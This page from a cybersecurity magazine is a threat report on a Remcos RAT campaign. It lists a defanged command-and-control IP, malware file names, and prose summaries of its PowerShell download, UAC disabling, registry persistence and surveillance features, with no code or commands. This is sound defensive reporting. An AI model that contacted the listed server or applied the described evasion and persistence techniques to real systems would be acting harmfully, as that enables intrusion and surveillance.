Page 84 - Cyber Defense eMagazine October 2023
P. 84
Introduction
Within the ever-evolving landscape of cybersecurity threats, our investigation has uncovered a
sophisticated ecosystem where the Remcos Remote Access Trojan (RAT) thrives. This ecosystem is
supported by a diverse array of servers that function as command and control (C2) centres, orchestrating
the distribution of Remcos RAT and various other malicious files to compromised systems. As part of our
commitment to ensuring digital security, this report delves into a thorough analysis of the Remcos RAT,
revealing a web of malicious IPs, intricate payloads, and techniques. By dissecting the modus operandi
of this threat, we endeavour to equip organizations and individuals with the insights needed to fortify their
defences against this persistent and sophisticated cyber menace.
Remcos RAT (Remote Control and Surveillance RAT) is a type of remote access Trojan that facilitates
unauthorized remote control and surveillance of compromised systems. It is malicious software designed
to infiltrate computers, gain control over them, and exfiltrate sensitive data. Remcos RAT is typically
spread through malicious attachments, drive-by downloads, or social engineering tactics. Since 2016,
Remcos RAT has been in operation. Initially BreakingSecurity, a European company, introduced it in
2016, marketing Remcos as legitimate tool for remote controlling. Despite the security company's
assertion that access is restricted to lawful intentions, Remcos RAT has now become a commonly
employed tool in various malicious campaigns conducted by threat actors.
Key Points
• Our investigation uncovers several IPs hosting the Remcos RAT, with "141[.]95[.]16[.]111[:]8080"
serving as a prime example. This IP hosts malicious files, including a .bat script ("recover.bat")
and the Remcos RAT binary ("RiotGames.exe"). Our OSINT research reveals a surge in IPs
delivering Remcos RAT payloads over the past two months, with fresh IPs detected even in the
current month.
• The "recover.bat" script, executed upon infection, harnesses PowerShell to download the second-
stage payload ("RiotGames.exe") from a remote location.
• The "RiotGames.exe" binary modifies the registry to disable User Account Control (UAC),
granting the malware elevated privileges. This tactic aims to evade UAC prompts and carry out
actions undetected. Additionally, the RAT establishes persistence by utilizing auto-run registry
keys.
• Extracted configuration data unveils critical details, including the C2 IP ("141[.]95[.]16[.]111"),
botnet name ("NewRem"), filenames, directories, and mutex name. This data guides Remcos
RAT's operation, which ranges from keylogging and audio recording to screenshot capture and
system manipulation.
• The malware incorporates keylogging and audio recording capabilities, capturing desktop
screenshots in bitmap format. The data can be exfiltrated, raising concerns about the potential
exposure of sensitive data and credentials.
• We believe with low confidence that the campaign is targeting the gaming industry and individuals
involved in gaming.
Cyber Defense eMagazine – October 2023 Edition 84
Copyright © 2023, Cyber Defense Magazine. All rights reserved worldwide.